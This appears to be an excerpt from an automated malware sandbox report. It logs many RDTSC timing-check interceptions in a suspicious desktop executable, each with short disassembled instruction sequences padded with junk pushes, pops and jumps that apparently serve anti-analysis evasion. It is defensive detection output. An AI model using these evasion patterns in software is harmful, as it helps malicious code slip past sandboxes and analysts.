Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1214BC8 second address: 1214BEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FD164C54729h 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1214DA6 second address: 1214DAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 121987B second address: 1219892 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164C54723h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 122683C second address: 1226842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1226842 second address: 122684A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 122684A second address: 1226860 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD164D1C75Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jp 00007FD164D1C756h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1235C63 second address: 1235C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FD164C54716h 0x0000000a jmp 00007FD164C54720h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1235C7F second address: 1235CAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FD164D1C768h 0x0000000b jmp 00007FD164D1C760h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 12382BA second address: 12382C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 12382C0 second address: 12382D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b ja 00007FD164D1C756h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 123A308 second address: 123A329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push ecx 0x00000007 jmp 00007FD164C54727h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 123A329 second address: 123A32F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1252EBB second address: 1252EC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1252EC0 second address: 1252EC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1252EC6 second address: 1252ECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1252ECA second address: 1252ECE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1253074 second address: 1253083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 jc 00007FD164C54716h 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1253083 second address: 1253088 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1253363 second address: 1253367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1253367 second address: 125336D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 125336D second address: 1253378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1253378 second address: 1253397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD164D1C75Dh 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edi 0x0000000d push ebx 0x0000000e pushad 0x0000000f jl 00007FD164D1C756h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1253666 second address: 125366C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 125366C second address: 1253675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1253675 second address: 1253679 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1253679 second address: 125367F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1253953 second address: 1253961 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD164C54716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 12595AC second address: 12595B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1259686 second address: 125968A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 125D1DE second address: 125D1F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD164D1C762h 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 59100ED second address: 59100F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58F0DEE second address: 58F0DF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58F0DF3 second address: 58F0E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD164C54726h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD164C54727h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58F0E2D second address: 58F0E6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 push ebx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c pushad 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop eax 0x00000010 jmp 00007FD164D1C765h 0x00000015 popad 0x00000016 jmp 00007FD164D1C760h 0x0000001b popad 0x0000001c pop ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58F0E6B second address: 58F0E6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58F0E6F second address: 58F0E8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164D1C769h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 59400E6 second address: 5940177 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD164C5471Fh 0x00000009 xor cx, E05Eh 0x0000000e jmp 00007FD164C54729h 0x00000013 popfd 0x00000014 jmp 00007FD164C54720h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d jmp 00007FD164C54720h 0x00000022 push eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 pushfd 0x00000027 jmp 00007FD164C54727h 0x0000002c adc ax, 87CEh 0x00000031 jmp 00007FD164C54729h 0x00000036 popfd 0x00000037 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 5940177 second address: 59401D6 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD164D1C760h 0x00000008 xor ax, C848h 0x0000000d jmp 00007FD164D1C75Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 push esi 0x00000017 pop edx 0x00000018 mov di, ax 0x0000001b popad 0x0000001c popad 0x0000001d xchg eax, ebp 0x0000001e pushad 0x0000001f mov eax, 7AF37289h 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007FD164D1C764h 0x0000002b sbb eax, 6B0D6DD8h 0x00000031 jmp 00007FD164D1C75Bh 0x00000036 popfd 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58D014B second address: 58D0151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58D0151 second address: 58D01EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushad 0x0000000b mov ecx, edx 0x0000000d pushfd 0x0000000e jmp 00007FD164D1C761h 0x00000013 sub ecx, 03307466h 0x00000019 jmp 00007FD164D1C761h 0x0000001e popfd 0x0000001f popad 0x00000020 call 00007FD164D1C760h 0x00000025 pushfd 0x00000026 jmp 00007FD164D1C762h 0x0000002b jmp 00007FD164D1C765h 0x00000030 popfd 0x00000031 pop eax 0x00000032 popad 0x00000033 mov ebp, esp 0x00000035 pushad 0x00000036 mov di, 6A80h 0x0000003a mov bh, AEh 0x0000003c popad 0x0000003d push dword ptr [ebp+04h] 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FD164D1C767h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58D01EA second address: 58D0248 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 pushfd 0x00000006 jmp 00007FD164C5471Bh 0x0000000b add ah, 0000000Eh 0x0000000e jmp 00007FD164C54729h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push dword ptr [ebp+0Ch] 0x0000001a jmp 00007FD164C5471Eh 0x0000001f push dword ptr [ebp+08h] 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FD164C54727h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58D0248 second address: 58D0260 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD164D1C764h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58F0B94 second address: 58F0BF3 instructions: 0x00000000 rdtsc 0x00000002 mov edx, 32CC0E7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FD164C54725h 0x0000000f add ch, FFFFFFD6h 0x00000012 jmp 00007FD164C54721h 0x00000017 popfd 0x00000018 popad 0x00000019 push eax 0x0000001a jmp 00007FD164C54721h 0x0000001f xchg eax, ebp 0x00000020 pushad 0x00000021 movzx esi, bx 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FD164C5471Eh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58F073B second address: 58F073F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58F073F second address: 58F0745 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58F0745 second address: 58F074B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58F074B second address: 58F077B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164C5471Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop eax 0x00000011 jmp 00007FD164C54729h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58F077B second address: 58F079B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 movsx ebx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD164D1C761h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 590019F second address: 5900218 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164C54721h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FD164C5471Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FD164C54721h 0x00000017 sbb ax, 0E26h 0x0000001c jmp 00007FD164C54721h 0x00000021 popfd 0x00000022 call 00007FD164C54720h 0x00000027 mov si, 7061h 0x0000002b pop ecx 0x0000002c popad 0x0000002d xchg eax, ebp 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FD164C5471Fh 0x00000037 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 5900218 second address: 590021E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 590021E second address: 590022D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD164C5471Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 590022D second address: 5900231 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 5940019 second address: 594001D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 594001D second address: 5940023 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 5940023 second address: 5940083 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164C54724h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FD164C54721h 0x00000011 or al, 00000006h 0x00000014 jmp 00007FD164C54721h 0x00000019 popfd 0x0000001a mov ax, 5CB7h 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 pushad 0x00000021 mov ecx, 48F22BAFh 0x00000026 pushad 0x00000027 mov dx, ax 0x0000002a mov ax, 19FDh 0x0000002e popad 0x0000002f popad 0x00000030 mov ebp, esp 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 pushad 0x00000036 popad 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 5940083 second address: 5940088 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 5940088 second address: 594008E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 594008E second address: 5940092 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 5940092 second address: 59400AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD164C5471Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 59400AD second address: 59400B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 5910463 second address: 5910469 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58F05D8 second address: 58F05DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58F05DE second address: 58F0601 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164C5471Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 call 00007FD164C5471Bh 0x00000015 pop esi 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 591001D second address: 5910077 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD164D1C75Fh 0x00000008 pushfd 0x00000009 jmp 00007FD164D1C768h 0x0000000e add esi, 2FE7C248h 0x00000014 jmp 00007FD164D1C75Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov dword ptr [esp], ebp 0x00000020 pushad 0x00000021 call 00007FD164D1C764h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 591026F second address: 591029D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 9D1Bh 0x00000007 call 00007FD164C54720h 0x0000000c pop eax 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], ebp 0x00000013 pushad 0x00000014 mov ax, bx 0x00000017 mov si, dx 0x0000001a popad 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 591029D second address: 59102A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 59102A1 second address: 59102A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 59102A7 second address: 59102F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD164D1C75Fh 0x00000009 or ah, FFFFFFDEh 0x0000000c jmp 00007FD164D1C769h 0x00000011 popfd 0x00000012 movzx eax, di 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FD164D1C765h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 59102F7 second address: 59102FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 5930703 second address: 5930713 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD164D1C75Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 5930713 second address: 5930778 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164C5471Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FD164C5471Bh 0x00000013 adc si, AD2Eh 0x00000018 jmp 00007FD164C54729h 0x0000001d popfd 0x0000001e popad 0x0000001f push eax 0x00000020 jmp 00007FD164C54721h 0x00000025 xchg eax, ebp 0x00000026 pushad 0x00000027 pushad 0x00000028 jmp 00007FD164C5471Ah 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 mov dx, 83A2h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 5930778 second address: 59307BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov ebp, esp 0x00000007 pushad 0x00000008 jmp 00007FD164D1C75Bh 0x0000000d pushad 0x0000000e mov esi, 5A1D7795h 0x00000013 jmp 00007FD164D1C762h 0x00000018 popad 0x00000019 popad 0x0000001a xchg eax, ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FD164D1C767h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 59307BF second address: 59307C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 59307C4 second address: 5930808 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FD164D1C765h 0x0000000a xor eax, 27321036h 0x00000010 jmp 00007FD164D1C761h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FD164D1C75Ch 0x00000021 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 5930808 second address: 5930883 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FD164C54727h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ecx 0x0000000e jmp 00007FD164C54726h 0x00000013 mov eax, dword ptr [778165FCh] 0x00000018 pushad 0x00000019 mov edi, esi 0x0000001b pushad 0x0000001c call 00007FD164C54728h 0x00000021 pop eax 0x00000022 mov ebx, 52FE3F06h 0x00000027 popad 0x00000028 popad 0x00000029 test eax, eax 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FD164C54728h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 5930883 second address: 59308AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164D1C75Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FD1D6B7F82Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD164D1C765h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 59308AF second address: 59308B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 59308B5 second address: 59308B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 59308B9 second address: 5930911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, eax 0x0000000a pushad 0x0000000b jmp 00007FD164C54725h 0x00000010 pushfd 0x00000011 jmp 00007FD164C54720h 0x00000016 or ch, FFFFFF98h 0x00000019 jmp 00007FD164C5471Bh 0x0000001e popfd 0x0000001f popad 0x00000020 xor eax, dword ptr [ebp+08h] 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FD164C54722h 0x0000002a rdtsc
